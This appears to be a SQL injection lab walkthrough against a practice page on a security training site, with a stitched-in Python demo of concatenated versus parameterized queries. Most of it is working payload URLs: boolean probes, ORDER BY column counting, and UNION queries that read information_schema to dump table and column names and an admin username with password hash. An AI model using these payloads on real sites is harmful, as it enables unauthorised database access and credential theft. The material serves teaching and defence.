http://www.nanhack.com/payload/sql/char.php?id=1' and 1=1--+   page renders normally
http://www.nanhack.com/payload/sql/char.php?id=1' and 1=2--+   page breaks
This shows that when the backend SQL statement receives the id parameter, it does not escape the quote in it, so the injected 1=1 (true) and 1=2 (false) take effect. The code looks like this:
$id = $_GET['id'];
$sql = "select * from admins where id = '$id'";
# so after appending "and 1=1" the statement becomes:
select * from admins where id = '1' and 1=1 --+'   # true, rows are returned
select * from admins where id = '1' and 1=2 --+'   # false, no rows are returned
So the injection type on this page is confirmed to be string-type (character) injection.
Determine the number of columns (display positions):
http://www.nanhack.com/payload/sql/char.php?id=1' order by 8--+   # normal
http://www.nanhack.com/payload/sql/char.php?id=1' order by 9--+   # breaks, so there are 8 columns
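To make the mechanism above concrete, here is an added example that is not part of the original page: it mirrors the PHP snippet in Python against an in-memory SQLite table standing in for admins (constructed sample rows, not real data). The concatenated query reacts to the two boolean probes exactly as described, while the parameterized version treats the whole value as a literal and returns nothing for either probe.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the page's admins table (sample data only)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table admins (id integer primary key, username text, userpwd text)")
    con.execute("insert into admins values (1, 'alice', 'sample-hash-1')")
    con.execute("insert into admins values (2, 'bob', 'sample-hash-2')")
    return con


def lookup_concat(con, id_value):
    """Mirrors the page's PHP: the GET value is spliced straight into the SQL text.

    Equivalent to: $sql = "select * from admins where id = '$id'";
    """
    sql = f"select id, username from admins where id = '{id_value}'"
    return con.execute(sql).fetchall()


def lookup_param(con, id_value):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL."""
    return con.execute("select id, username from admins where id = ?", (id_value,)).fetchall()


def boolean_probe_changes_result(lookup, con):
    """Return True if the page's two probes yield different row sets through `lookup`.

    After URL decoding, the page's "--+" suffix is "-- " (comment plus a space).
    A lookup that returns True here is splicing user input into the query.
    """
    true_case = lookup(con, "1' and 1=1-- ")
    false_case = lookup(con, "1' and 1=2-- ")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", boolean_probe_changes_result(lookup_concat, db))
    print("parameterized query injectable:", boolean_probe_changes_result(lookup_param, db))
```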
Union query
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8--+
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,database(),3,4,5,6,7,8--+   # database name obtained: nanhack
Dump the table names
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--+
# table names obtained: admin_logs,admins,class,facebook,kaiban,message,news,user
Dump all columns of the admins table
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database() and table_name='admins'--+
# column names obtained: id,username,userpwd,email,sex,money,role,vip
Retrieve one row from admins
http://www.nanhack.com/payload/sql/char.php?id=-1' UNION SELECT 1,concat(username,0x23,userpwd),3,4,5,6,7,8 from admins limit 0,1--+
# data obtained: 必火网络安全#68d7e8e91c53395e3d29a938c1ab5d18